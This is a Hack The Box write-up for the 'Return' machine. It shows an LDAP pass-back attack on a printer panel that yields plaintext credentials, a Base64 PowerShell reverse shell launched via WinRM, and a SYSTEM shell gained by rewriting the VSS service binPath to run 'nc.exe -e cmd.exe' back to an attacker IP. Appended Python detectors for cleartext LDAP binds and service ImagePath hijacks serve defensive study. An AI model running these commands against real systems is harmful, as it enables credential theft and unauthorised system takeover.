HTB - Return
Target IP: 10.129.95.241
Domain: return.local
DC Hostname: PRINTER.return.local
OS: Windows Server 2019 (10.0.17763)
Difficulty: Easy
Author: [g1nt0n1c]
1. Phase 1: Reconnaissance & Information Gathering
1.1 TCP Port Discovery
```bash
# Full version/script scan, skip host discovery (-Pn), verbose, save all formats
nmap -sV -sC -Pn -v -oA nmap/Return 10.129.95.241
```
```
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
88/tcp open kerberos-sec Microsoft Windows Kerberos
389/tcp open ldap Microsoft Windows AD LDAP (Domain: return.local)
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0
Service Info: Host: PRINTER; OS: Windows
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
```
Port Analysis & Attack Surface
| Port | Service | Notes |
|---|---|---|
| 80/tcp | IIS 10.0 | "HTB Printer Admin Panel" — web UI for a network printer |
| 88/tcp | Kerberos | Domain Controller confirmed |
| 389/tcp | LDAP | AD LDAP; domain return.local — and the port the printer uses to authenticate |
| 445/tcp | SMB | SMB signing required — relay attacks blocked |
| 5985/tcp | WinRM | Remote shell entry point if valid credentials are found |
| 3268/tcp | LDAP GC | Global Catalog — full forest-wide directory |
Key observation: Port 80 exposes a printer admin panel. Network printers commonly authenticate against LDAP/AD to validate print job permissions. Any UI that lets you change the LDAP server address is a candidate for a Pass-Back Attack.
2. Phase 2: Pass-Back Attack — Credential Capture via Printer
2.1 Identify the Vulnerable Configuration Page
Browsing to port 80 reveals the HTB Printer Admin Panel. The Settings page exposes:
- Server Address — currently the DC's IP
- LDAP Port — 389
- Username — svc-printer
- Password — masked but stored on the device
2.2 The Attack Concept
The printer is configured to authenticate to an LDAP server. If we replace the server address with our own IP and start a listener on port 389, the printer will connect to us and send its stored credentials in the clear as part of the LDAP bind request.
This is called a Pass-Back Attack: rather than cracking a hash, we redirect the authentication flow back to ourselves and receive plaintext credentials.
2.3 Execute the Attack
Step 1 — Start a raw listener on port 389 (LDAP)
```bash
# Listen on port 389 — the port the printer will connect to
nc -lvnp 389
```
Step 2 — Replace the server address in the printer's Settings page with your tun0 IP, then click Update/Save. The printer immediately attempts to re-authenticate.
Step 3 — Catch the credentials
```
connect to [10.10.16.149] from (UNKNOWN) [10.129.95.241] 59659
0*`%return\svc-printer
1edFg43012!!
```
The LDAP bind request contains the username and password in plaintext.
2.4 Validate Captured Credentials
```bash
# Confirm the credentials work over WinRM
nxc winrm 10.129.95.241 -u svc-printer -p '1edFg43012!!'
# [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)
```
3. Phase 3: Initial Access
3.1 Open Shell as svc-printer
Generate a Base64-encoded PowerShell reverse shell at revshells.com, then execute it via WinRM.
```bash
# Start listener
rlwrap nc -lvnp 5555
# Execute reverse shell payload
nxc winrm 10.129.95.241 -u svc-printer -p '1edFg43012!!' -X "powershell -e JABjAGwAaQBlAG4AdA..."
# In the reverse shell: whoami
# return\svc-printer
```
4. Phase 4: Privilege Escalation
4.1 Enumerate Group Memberships
```powershell
# Show all local and global group memberships for the current user
net user svc-printer
```
```
Local Group Memberships:
*Print Operators
*Remote Management Users
*Server Operators ← High-value group
```
Server Operators is a built-in Windows group that can start/stop/modify system services and has powerful backup privileges. This is a well-known privilege escalation path.
4.2 Enumerate Privileges
```powershell
whoami /priv
```
| Privilege Name | Description | State | Note |
|---|---|---|---|
| SeLoadDriverPrivilege | Load and unload device drivers | Enabled | |
| SeBackupPrivilege | Back up files and directories | Enabled | bypass ACLs for reads |
| SeRestorePrivilege | Restore files and directories | Enabled | bypass ACLs for writes |
| SeShutdownPrivilege | Shut down the system | Enabled | |
Two paths to escalation are available — we use both below.
Path A: Read Privileged Files via SeBackupPrivilege + robocopy
SeBackupPrivilege allows a process to bypass NTFS ACL checks when reading files. robocopy /B invokes the Backup API, letting us copy files we cannot normally read — including Administrator’s desktop.
```powershell
# /B = Backup mode (bypasses ACL). Copies Administrator's desktop to a world-readable location.
robocopy /B C:\Users\Administrator\Desktop C:\Temp
# Read the flag
type C:\Temp\root.txt
```
Path B: SYSTEM Shell via Server Operators Service Abuse
Server Operators can reconfigure and restart any Windows service. We overwrite the binPath of an existing service with a reverse shell binary (nc.exe), then restart the service to execute it as SYSTEM.
Step 1 — Transfer nc.exe to the target
Upload nc.exe to C:\Users\svc-printer\Documents\ via the Evil-WinRM upload command or a Python HTTP server.
Step 2 — Hijack the VSS service binary path
```powershell
# Overwrite VSS service's executable with our nc.exe reverse shell
sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.16.149 4444"
```
Step 3 — Start listener on Kali
```bash
nc -lvnp 4444
```
Step 4 — Restart the service to trigger execution
```powershell
sc.exe stop vss
sc.exe start vss
```
Result:
```
connect to [10.10.16.149] from (UNKNOWN) [10.129.95.241] 49264
Microsoft Windows [Version 10.0.17763.107]
C:\Windows\system32> whoami
nt authority\system
```
Deep Dive: The Pass-Back Attack
Network printers, scanners, and other embedded devices frequently authenticate against LDAP to look up user mailboxes (scan-to-email), validate print permissions, or sync address books. The credentials are stored on the device itself.
The admin panel’s “Server Address” field is trusted blindly — the device makes an outbound LDAP bind to whatever IP is configured. By pointing it at ourselves and listening on port 389, we receive the stored credentials in the LDAP bind request, which carries the username and password in plaintext (simple bind, not SASL).
Why this is so effective:
- No hash to crack — credentials arrive as plaintext
- Requires only web UI access to the printer admin panel
- The printer re-authenticates immediately on settings save — no user interaction needed
- The same technique applies to any device that makes outbound LDAP, SMTP, or similar authentication requests: VoIP phones, network scanners, monitoring agents
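What the listener in section 2.3 actually received is a BER-encoded LDAPv3 BindRequest; the odd leading characters `0*`%` in that capture are the printable bytes of its header (0x30 0x2a for the outer SEQUENCE and its length, 0x60 0x25 for the [APPLICATION 0] BindRequest and its length), and the password sits in it as a plain OCTET STRING. The decoder below is an added example, not code from the writeup or from the HTB machine: it parses such a message from raw bytes, explains why a raw nc listener shows the name and password as readable text, and turns that into a detection rule (simple bind with a non-empty password on unencrypted port 389). The account name follows the capture; the password is a constructed placeholder of the same length so the header bytes match.

```python
"""Decode an LDAP simple BindRequest from raw bytes and flag cleartext credentials.

Added example, not part of the original writeup. Password below is a constructed
12-byte placeholder (same length as the captured one, so the BER header matches).
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Optional

# BER tags of an LDAPMessage carrying a BindRequest (RFC 4511, X.690)
TAG_SEQUENCE = 0x30       # LDAPMessage ::= SEQUENCE { messageID, protocolOp }
TAG_INTEGER = 0x02
TAG_OCTET_STRING = 0x04
TAG_BIND_REQUEST = 0x60   # BindRequest ::= [APPLICATION 0] SEQUENCE
TAG_SIMPLE_AUTH = 0x80    # AuthenticationChoice.simple ::= [0] OCTET STRING


def _tlv(tag: int, payload: bytes) -> bytes:
    """Encode one BER TLV; short-form length only (payload < 128 bytes)."""
    if len(payload) >= 0x80:
        raise ValueError("long-form length not needed for this example")
    return bytes([tag, len(payload)]) + payload


def encode_simple_bind(message_id: int, name: str, password: str) -> bytes:
    """Bytes an LDAPv3 client sends for a simple bind: the password is neither
    hashed nor encrypted, only wrapped in a BER OCTET STRING."""
    bind = (
        _tlv(TAG_INTEGER, bytes([3]))               # version 3
        + _tlv(TAG_OCTET_STRING, name.encode())     # bind name / account
        + _tlv(TAG_SIMPLE_AUTH, password.encode())  # simple: plaintext password
    )
    return _tlv(TAG_SEQUENCE,
                _tlv(TAG_INTEGER, bytes([message_id])) + _tlv(TAG_BIND_REQUEST, bind))


def _read_tlv(data: bytes, pos: int) -> tuple[int, bytes, int]:
    """Return (tag, payload, next_pos) for the short-form TLV starting at pos."""
    if pos + 2 > len(data):
        raise ValueError("truncated TLV header")
    tag, length = data[pos], data[pos + 1]
    if length & 0x80:
        raise ValueError("long-form length not supported")
    end = pos + 2 + length
    if end > len(data):
        raise ValueError("truncated TLV payload")
    return tag, data[pos + 2:end], end


@dataclass
class SimpleBind:
    message_id: int
    name: str
    password: str


def parse_simple_bind(data: bytes) -> Optional[SimpleBind]:
    """Return the credentials if data is a simple BindRequest, otherwise None
    (other operations, SASL binds and malformed input all yield None)."""
    try:
        tag, msg, _ = _read_tlv(data, 0)
        if tag != TAG_SEQUENCE:
            return None
        tag, mid, pos = _read_tlv(msg, 0)
        if tag != TAG_INTEGER:
            return None
        tag, bind, _ = _read_tlv(msg, pos)
        if tag != TAG_BIND_REQUEST:
            return None                      # search, unbind, ...: not a bind
        _, _version, pos = _read_tlv(bind, 0)
        _, name, pos = _read_tlv(bind, pos)
        tag, auth, _ = _read_tlv(bind, pos)
        if tag != TAG_SIMPLE_AUTH:
            return None                      # SASL bind: no bare password field
        return SimpleBind(int.from_bytes(mid, "big"),
                          name.decode(errors="replace"), auth.decode(errors="replace"))
    except ValueError:
        return None


def printable_preview(data: bytes) -> str:
    """What a raw nc listener prints: the message with non-printable bytes dropped."""
    return "".join(chr(b) for b in data if 0x20 <= b < 0x7F)


def cleartext_bind_alerts(flows: list[tuple[int, bytes]]) -> list[str]:
    """Detection rule: a simple bind with a non-empty password on plain port 389."""
    alerts = []
    for dst_port, payload in flows:
        bind = parse_simple_bind(payload)
        if dst_port == 389 and bind is not None and bind.password:
            alerts.append(f"cleartext LDAP simple bind as {bind.name} to port {dst_port}")
    return alerts


# Constructed samples: the bind a printer would send, and an unbind ([APPLICATION 2] NULL).
SAMPLE_BIND = encode_simple_bind(1, r"return\svc-printer", "Constructed!")
SAMPLE_UNBIND = _tlv(TAG_SEQUENCE, _tlv(TAG_INTEGER, bytes([2])) + bytes([0x42, 0x00]))

if __name__ == "__main__":
    print(printable_preview(SAMPLE_BIND))   # 0*`%return\svc-printerConstructed!
    for alert in cleartext_bind_alerts([(389, SAMPLE_BIND), (389, SAMPLE_UNBIND)]):
        print(alert)
```

On the wire this rule only fires for plain port 389; over LDAPS (636) or after StartTLS the same bytes are inside TLS, and with a SASL bind there is no simple password field to read, which is exactly why those are the fixes for devices like this printer. Domain controllers can also log the server side of the same condition: with LDAP Interface Events diagnostics raised, Active Directory records Event ID 2889 for each client that performs a simple bind without TLS, naming the client address and account.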
Deep Dive: Server Operators — Service Binary Hijacking
The Server Operators built-in group was designed to let non-admin staff manage services on servers. It grants:
- sc.exe config — modify any service's binary path, startup type, or account
- sc.exe start/stop — start and stop any service
- Inherited SeBackupPrivilege and SeRestorePrivilege
Service binaries run under the account defined in the service configuration. System services (like VSS) run as NT AUTHORITY\SYSTEM — the highest-privilege account on Windows. By replacing the binary path with our own executable, the next service start runs our code as SYSTEM.
Defensive note: The Server Operators group is frequently over-assigned in production environments. Audit group membership and prefer granting only the specific service management rights needed rather than full Server Operators membership.
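The detection side of Path B and of this deep dive, as an added example that is not part of the original writeup: when sc.exe config rewrites a service's binary path, the Service Control Manager persists it as the ImagePath value under that service's registry key, and Sysmon Event ID 13 (RegistryEvent: Value Set) records the new value. The script below reads such records as JSON lines and flags any ImagePath that now points outside the directories a service binary is expected to live in. The records, timestamps and trusted-directory list are constructed assumptions for the example, to be tuned per environment; the field names follow Sysmon's Event ID 13 schema.

```python
"""Flag service ImagePath changes that point a service at an unexpected binary.

Added example, not part of the original writeup. It consumes Sysmon Event ID 13
(RegistryEvent: Value Set) records as JSON lines, the shape a log shipper usually
emits; the records below are constructed to mirror Path B above.
"""
from __future__ import annotations

import json
import re

# Sysmon reports the value path as HKLM\System\CurrentControlSet\Services\<svc>\ImagePath
IMAGEPATH_RE = re.compile(
    r"^HKLM\\System\\CurrentControlSet\\Services\\(?P<service>[^\\]+)\\ImagePath$",
    re.IGNORECASE,
)

# Where a service binary is expected to live (assumption: tune per environment).
# Anything else (user profiles, Temp, ProgramData drop folders) is worth a look.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def binary_from_command(details: str) -> str:
    """Pull the executable out of a service command line, quoted or not."""
    details = details.strip()
    if details.startswith('"'):
        return details[1:details.find('"', 1)]
    m = re.match(r"(.*?\.exe)", details, re.IGNORECASE)   # unquoted: stop at first .exe
    return m.group(1) if m else details.split(" ", 1)[0]


def is_trusted_binary(path: str) -> bool:
    """Normalise the common forms (%SystemRoot%, \\SystemRoot\\) and check the prefix."""
    norm = path.lower().replace("%systemroot%", "c:\\windows")
    if norm.startswith("\\systemroot\\"):
        norm = "c:\\windows\\" + norm[len("\\systemroot\\"):]
    return norm.startswith(TRUSTED_DIRS)


def load_events(jsonl: str) -> list[dict]:
    """Parse newline-delimited JSON records, skipping blank lines."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def imagepath_alerts(events: list[dict]) -> list[dict]:
    """Return one alert per ImagePath change whose binary sits outside TRUSTED_DIRS."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        m = IMAGEPATH_RE.match(ev.get("TargetObject", ""))
        if not m:
            continue                       # some other value under the service key
        binary = binary_from_command(ev.get("Details", ""))
        if is_trusted_binary(binary):
            continue
        alerts.append({
            "service": m["service"],
            "binary": binary,
            "command": ev.get("Details", ""),
            # The SCM (services.exe) writes the key on behalf of whoever ran sc.exe,
            # so Image identifies the writer process, not the operator's account.
            "writer": ev.get("Image", "?"),
            "time": ev.get("UtcTime", "?"),
        })
    return alerts


# Constructed sample records: a Start-type change, two legitimate ImagePath values
# (env-var form and quoted form) and a hijack modelled on Path B.
SAMPLE_EVENTS = r'''
{"EventID": 13, "UtcTime": "2024-01-01 10:00:00.000", "Image": "C:\\Windows\\system32\\services.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\VSS\\Start", "Details": "DWORD (0x00000003)"}
{"EventID": 13, "UtcTime": "2024-01-01 10:00:05.000", "Image": "C:\\Windows\\system32\\services.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath", "Details": "%SystemRoot%\\System32\\spoolsv.exe"}
{"EventID": 13, "UtcTime": "2024-01-01 10:00:07.000", "Image": "C:\\Windows\\system32\\services.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\VendorAgent\\ImagePath", "Details": "\"C:\\Program Files (x86)\\Vendor\\agent.exe\" --service"}
{"EventID": 13, "UtcTime": "2024-01-01 10:01:12.000", "Image": "C:\\Windows\\system32\\services.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\VSS\\ImagePath", "Details": "C:\\Users\\svc-printer\\Documents\\nc.exe -e cmd.exe 10.10.16.149 4444"}
'''

if __name__ == "__main__":
    for alert in imagepath_alerts(load_events(SAMPLE_EVENTS)):
        print(alert)
```

Because the registry write is performed by services.exe, the alert alone does not say which account reconfigured the service; correlate it with the process-creation event (Sysmon Event ID 1) for the sc.exe command line issued shortly before, whose user field will show the Server Operators member. Installers legitimately set ImagePath too, which is why the rule keys on where the binary lives rather than on the change itself; pair it with the group-membership audit recommended in the defensive note above.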